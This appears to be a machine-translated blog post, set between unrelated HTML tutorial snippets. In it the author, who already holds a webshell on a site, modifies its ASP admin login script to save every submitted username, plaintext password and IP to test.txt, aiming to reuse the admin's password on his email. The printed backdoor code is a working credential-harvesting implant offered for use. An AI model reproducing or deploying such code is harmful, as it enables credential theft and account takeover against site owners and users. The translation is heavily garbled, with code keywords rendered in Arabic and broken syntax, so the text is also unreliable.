موصى به: مجموعة كتابة كود HTML HTML هي لغة ترميز النص التشعبي (لغة النص التشعبي) ، والمعروفة أيضًا باسم لغة الويب ويب ، ضرورية لفهمها على صفحات الويب. على الرغم من أن هناك العديد من الأدوات لصنع صفحات الويب الآن ، مثل DreamWvear و Frontpage ، وما إلى ذلك ، يمكنك بالفعل إنشاء صفحات ويب جميلة دون فهم هذه الرموز. . . نظرًا لأن محتوى HTML عديدة ، فإن قلة من الأشخاص على استعداد لكتابة التعليمات البرمجية لصنع صفحات الويب (الكفاءة) ، ومعظمهم يستخدمون
في شيك أمني ، حصلت بالفعل على WebShell ، لكنني أحتاج أيضًا إلى الأخصائي الاجتماعي للحصول على معلومات أخرى في عنوان بريده الإلكتروني ، لذلك يجب أن أعرف عاداته.
تم تنزيل قاعدة البيانات ، ولكن لا يمكن فك تشفير كلمة مرور MD5. للأسف ، يبدو أنك تحتاج فقط إلى تسجيل كلمة مرور حساب مسؤول تسجيل الدخول!
حفظ مشكلة التخلص من المشكلة!
كلمة المرور هذه مهمة بالفعل ولكنها ليست مهمة.
لأن الكثير من الناس يحبون استخدام نفس كلمة المرور. حتى أجهزة الكشف عن الأمان مثلي هي عادة عادة استخدام كلمة مرور الحساب نفسها.
أولاً ، تحقق من رمز تسجيل الدخول إلى الخلفية
<٪
تسجيل داء
تعيين تسجيل الدخول = adlogin الجديد
login.execute
فئة adlogin
sexomcls الخاصة
sub class_initialize الخاص
تعيين commcls = شائع جديد
excommcls.isipallow
excommcls.checkinstall
excommcls.getConfigCache (*)
نهاية الفرعية
sub class_terminate الخاص
تعيين excommcls = لا شيء
نهاية الفرعية
التنفيذ العام
عمل خافت
الإجراء = طلب (إجراء)
حدد إجراء حالة
Case Checklogin
Checklogin
القضية تسجيل الدخول
تسجيل الدخول
حالة أخرى
logInf
نهاية الاختيار
نهاية الفرعية
checklogin sub الخاص
Dim adname ، ADPWD ، CheckCode
adname = excommcls.g (trim (request (adname)))
ADPWD = MD5 (TRIM (طلب (ADPWD))))
CheckCode = excommcls.g (طلب (CheckCode))
إذا كانت STRIM (CheckCode) <> SEXICKODE) والتطبيق (SN & ISCHECKCODE) = نعم ثم
رمز التحقق من Excommcls.ShowMsg غير صحيح! ، التطبيق (sn & blogurl) & admin_login.asp
الخروج الفرعي
إنهاء إذا
إذا كانت القطع (adName) = CSTR (Application (sn & adname)) و trim (adpwd) = cstr (application (sn & adpwd)) ثم
استجابة
استجابة
الجلسة (adlogin) = MD5 (SN)
excommcls.getConfigCache (*)
excommcls.getClassCache ()
Response.Redirect (التطبيق (SN & blogurl) & admin_index.asp)
آخر
حساب أو كلمة مرور SecrocmCls.ShowMsg خاطئ ، التطبيق (SN & Blogurl) & admin_login.asp
إنهاء إذا
نهاية الفرعية
تسجيل الدخول الفرعي الخاص
استجابة
استجابة
Session.abandon ()
SECSOMMCLS.SHOWMSG تم تسجيلها بنجاح ، التطبيق (SN & Blogurl) & index.asp
نهاية الفرعية
تسجيل الدخول الفرعي الخاص
٪>
انظر إلى الكود التالي
adname = excommcls.g (trim (request (adname)))
ADPWD = MD5 (TRIM (طلب (ADPWD))))
--- المعنى بسيط للغاية ، لذلك لا أشرح ذلك بشكل صريح هنا. يعتمد بشكل رئيسي على MD5. إذا تم تشفير كلمة المرور باستخدام MD5 ، فستكون كلمة المرور التي سجلناها عديمة الفائدة ، ولا تزال MD5. لذا
لذلك فكرت في طريقة الصيد. واجهة تسجيل الدخول الأصلية لها
checklogin sub الخاص
Dim AdName ، ADPWD ، CheckCode ، StrlogText ، IP ، FF
adname = excommcls.g (trim (request (adname)))
ADPWD = (trim (request (ADPWD))))
CheckCode = excommcls.g (طلب (CheckCode))
strlogfile = test.txt
IP = طلب (IP)
strlogtext = strlogtext & adname & ---- & adpwd & ----- IP: & ip & (remote_host)
set f = server.createObject (scripting.filesystemObject)
set ff = f.opentextFile (server.mapath (.) و/& strlogfile ، 8 ، true ، 0)
ff.writeline (Chr (13)+chr (10) و strlogtext)
ff.close
تعيين ff = لا شيء
تعيين f = لا شيء
إذا كانت STRIM (CheckCode) <> SEXICKODE) والتطبيق (SN & ISCHECKCODE) = نعم ثم
رمز التحقق من Excommcls.ShowMsg غير صحيح! ، التطبيق (sn & blogurl) & admin_1ogin.asp
الخروج الفرعي
إنهاء إذا
إذا كانت القطع (adName) = CSTR (Application (sn & adname)) و trim (adpwd) = cstr (application (sn & adpwd)) ثم
استجابة
استجابة
الجلسة (adlogin) = MD5 (SN)
excommcls.getConfigCache (*)
excommcls.getClassCache ()
Response.Redirect (التطبيق (SN & blogurl) & admin_1ogin.asp)
آخر
حساب أو كلمة مرور SecrocmCls.ShowMsg خاطئ ، التطبيق (SN & Blogurl) & admin_1ogin.asp
إنهاء إذا
نهاية الفرعية
انظر أم لا ،
A = تم الآن استبدال صفحة تسجيل الدخول الأصلية بصفحة التصيد
B = يتم تعديل صفحة تسجيل الدخول الأصلية (admin_login.asp) إلى admin_1ogin.asp
لماذا؟
الأصل: ADPWD = MD5 (trim (request (ADPWD))))
استجابة
يراجع
ADPWD = (trim (request (ADPWD))))
استجابة
إزالة MD5. . تم استخدام هذه الطريقة المربكة لفترة طويلة! . .
لا محتوى تقني. من فضلك لا تضحك علي! سيتم تسجيل كلمة المرور على test.txt
المشاركة: أبرز ما في عناصر الرأس تتكون مستندات HTML من جزأين: الرأس (الجزء ، غير مرئي عمومًا) والجسم (جزء الجسم ، مرئي في المتصفح). مع شعبية محرري الويب المرئي مثل FrontPage و Dreamweaver (DW) ، لم يعد من الحلم إنشاء صفحة ويب احترافية دون فهم HTML. ومع ذلك ، لا يمكن استخدام أدوات إنشاء الصفحة الرئيسية هذه